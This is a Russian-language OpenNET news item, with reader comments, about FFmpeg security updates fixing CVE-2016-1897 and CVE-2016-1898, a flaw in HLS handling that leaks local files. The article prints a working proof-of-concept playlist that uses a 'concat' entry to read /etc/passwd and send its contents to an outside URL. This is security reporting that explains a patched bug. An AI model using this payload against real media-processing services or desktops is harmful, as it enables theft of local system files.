The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги ]

16.01.2016 18:39  В FFmpeg устранена уязвимость, которая может привести к утечке локальных файлов

Доступны корректирующие обновления мультимедиа-пакета FFmpeg 2.8.5, 2.7.5, 2.6.7 и 2.5.10, в которых устранены опасные уязвимости (CVE-2016-1897, CVE-2016-1898) в реализации поддержки формата HLS (HTTP Live Streaming), которые могут привести к выгрузке произвольных файлов в случае обработки специально оформленных данных утилитами ffmpeg, ffprobe, avconv и avprobe. Например, уязвимость представляет угрозу сервисам, в которых осуществляется перекодирование или обработка поступающих от пользователей файлов при помощи ffmpeg/libav, и файловым менеджерам, использующим ffmpeg/libav для создания эскизов.

Уязвимость может использоваться для подстановки содержания произвольного локального файла в результат перекодирования или для отправки локального файла на произвольный внешний URL. В частности, можно передать для обработки файл с произвольным расширением (avi, mov и т.п.), в котором добавить заголовок и данные плейлиста в формате HLS m3u8, указав в качестве одного из элементов блок "concat" с внешним URL и локальным файлом, например:


   #EXTM3U
   #EXT-X-MEDIA-SEQUENCE:0
   #EXTINF:10.0,
   concat:http://test.com/header.m3u8|file:///etc/passwd
   #EXT-X-ENDLIST

В результате обработки данного файла ffmpeg загрузит http://test.com/header.m3u8, который может содержать:

   #EXTM3U
   #EXT-X-MEDIA-SEQUENCE:0
   #EXTINF:,
   http://example.org?

После обработки header.m3u8 ffmpeg передаст содержимое file:///etc/passwd в составе запроса на URL "http://example.org". Если вместо операции concat в переданном для обработки файле ограничиться указанием file:///etc/test.txt, то будет создан мультимедийный файл, включающий первую строку указанного локального файла.





  1. Главная ссылка к новости (https://twitter.com/FFmpeg/sta...)
  2. OpenNews: Выпуск мультимедиа-пакета FFmpeg 2.8 с обилием новых фильтров
  3. OpenNews: Лидер проекта FFmpeg сложил с себя полномочия
  4. OpenNews: Утверждён переход Debian на FFmpeg
  5. OpenNews: Опасная уязвимость в реализациях LZO/LZ4, затрагивающая ядро Linux, FFmpeg, OpenVPN и другие проекты
  6. OpenNews: Компания Google помогла устранить более тысячи проблем в исходном коде проекта FFmpeg
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: ffmpeg
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение Линейный вид | Ajax | Показать все | RSS
 
  • 1.1, soarin, 19:17, 16/01/2016 [ответить] [смотреть все]
  • +/
    % brew info ffmpeg
    ffmpeg: stable 2.8.4 (bottled), HEAD

    Вот так посмотришь чего-то и похакают...

     
     
  • 2.28, й, 16:55, 17/01/2016 [^] [ответить] [смотреть все] [показать ветку]
  • +1 +/
    твои мак-серверы уже в безопасности, комрад ffmpeg stable 2 8 5 bottled , HEA... весь текст скрыт [показать] [показать ветку]
     
  • 1.2, Anonplus, 19:43, 16/01/2016 [ответить] [смотреть все]  
  • +5 +/
    Самое крутое, что в той же убунте достаточно лишь скачать такой видеофайл и при создании эскиза в файловом менеджере сразу всё и произойдёт.

    Вот более подробное описание непосредственно от человека, обнаружившего уязвимость и отправившего патч в FFmpeg: http://habrahabr.ru/company/mailru/blog/274855/

     
     
  • 2.3, soarin, 20:03, 16/01/2016 [^] [ответить] [смотреть все] [показать ветку]  
  • –2 +/
    Ну так в линуксах же всюду эскизы в файловых менеджерах делаются с помощью ffmpe... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.4, anon1984, 20:35, 16/01/2016 [^] [ответить] [смотреть все]  
  • +1 +/
    нет
     
     
  • 4.26, soarin, 13:25, 17/01/2016 [^] [ответить] [смотреть все]  
  • +/
    Ну что нет? Поглядел на Dolphin - тоже самое...
     
  • 3.22, Аноним, 10:54, 17/01/2016 [^] [ответить] [смотреть все]  
  • +1 +/
    Я у себя в KDE когда-то отключил из-за бага с disk i o Эти эскизы ещё попьют кр... весь текст скрыт [показать]
     
  • 1.5, Аноним, 22:00, 16/01/2016 [ответить] [смотреть все]  
  • +2 +/
    Пустил Tor через VPN Скачал файл Файл напрямую обратился к IP honeypot при зап... весь текст скрыт [показать]
     
     
  • 2.6, Аноним, 22:01, 16/01/2016 [^] [ответить] [смотреть все] [показать ветку]  
  • +1 +/
    Не Tor, а торрент клиент через Tor или VPN. Или их комбинацию.
     
  • 2.7, Аноним, 22:32, 16/01/2016 [^] [ответить] [смотреть все] [показать ветку]  
  • –1 +/
    Файл напрямую обратился к IP Чтобы специально подготовленный видеофайл отправи... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.29, Аноно, 11:26, 21/01/2016 [^] [ответить] [смотреть все]  
  • +/
    Нет, достаточно ПРОСТО ИМЕТЬ файловый менеджер с эскизами практически все дист... весь текст скрыт [показать]
     
  • 1.8, Аноним, 22:45, 16/01/2016 [ответить] [смотреть все]  
  • +/
    Как он додумался до такого вообще всегда после сообщения о нахождении какой-т... весь текст скрыт [показать]
     
     
  • 2.11, Аноним, 00:38, 17/01/2016 [^] [ответить] [смотреть все] [показать ветку]  
  • +1 +/
    человек либо копался в коде и сумел хорошо его понять, т е он или разраб, или з... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.15, Crazy Alex, 04:22, 17/01/2016 [^] [ответить] [смотреть все]  
  • +3 +/
    Вообще-то это скорее склад ума такой - понять, как нечто работает и оценить, что... весь текст скрыт [показать]
     
  • 2.14, Аноним, 01:13, 17/01/2016 [^] [ответить] [смотреть все] [показать ветку]  
  • +1 +/
    Расслабься, тут нужно мозгом думать - не всем дано
     
     
  • 3.16, Crazy Alex, 04:23, 17/01/2016 [^] [ответить] [смотреть все]  
  • +1 +/
    Дано-то всем, но не всем нравится
     
  • 2.23, Аноним, 11:17, 17/01/2016 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    В данном случае довольно простая идея Использовать плейлист вместо реальной дор... весь текст скрыт [показать] [показать ветку]
     
  • 1.10, privation, 00:36, 17/01/2016 [ответить] [смотреть все]  
  • –1 +/
    это только часть айсберга
     
     
  • 2.13, Аноним, 00:47, 17/01/2016 [^] [ответить] [смотреть все] [показать ветку]  
  • +1 +/
    его обычно с титаниками используют вроде blender, vlc, mpv, mplayer, chrome, etc... весь текст скрыт [показать] [показать ветку]
     
  • 1.24, Аноним, 11:19, 17/01/2016 [ответить] [смотреть все]  
  • –1 +/
    Ник cdump - что может значить буква си?
     
  • 1.25, iZEN, 12:13, 17/01/2016 [ответить] [смотреть все]  
  • +/
    % pkg info -r ffmpeg-2.8.4,1
    ffmpeg-2.8.4,1:
    firefox-43.0.4_1,1
    gstreamer1-libav-1.6.2
    mpv-0.14.0,1
    youtube_dl-2016.01.14
    aqualung-1.0
     
  • 1.27, Ыр2.0, 15:16, 17/01/2016 [ответить] [смотреть все]  
  • +/
    Когда во ффмпеге будет многопоточность для флака?
     
  • 1.30, arisu, 07:05, 22/01/2016 [ответить] [смотреть все]  
  • +/
    хоспаде, дался всем этот /etc/passwd… ну, на здоровье. помогло чем? http://dpaste.com/3BMFXPB
     

     Добавить комментарий
    Имя:
    E-Mail:
    Заголовок:
    Текст:


      Закладки на сайте
      Проследить за страницей
    Created 1996-2017 by Maxim Chirkov  
    ДобавитьРекламаВебмастеруГИД  
    Hosting by Ihor TopList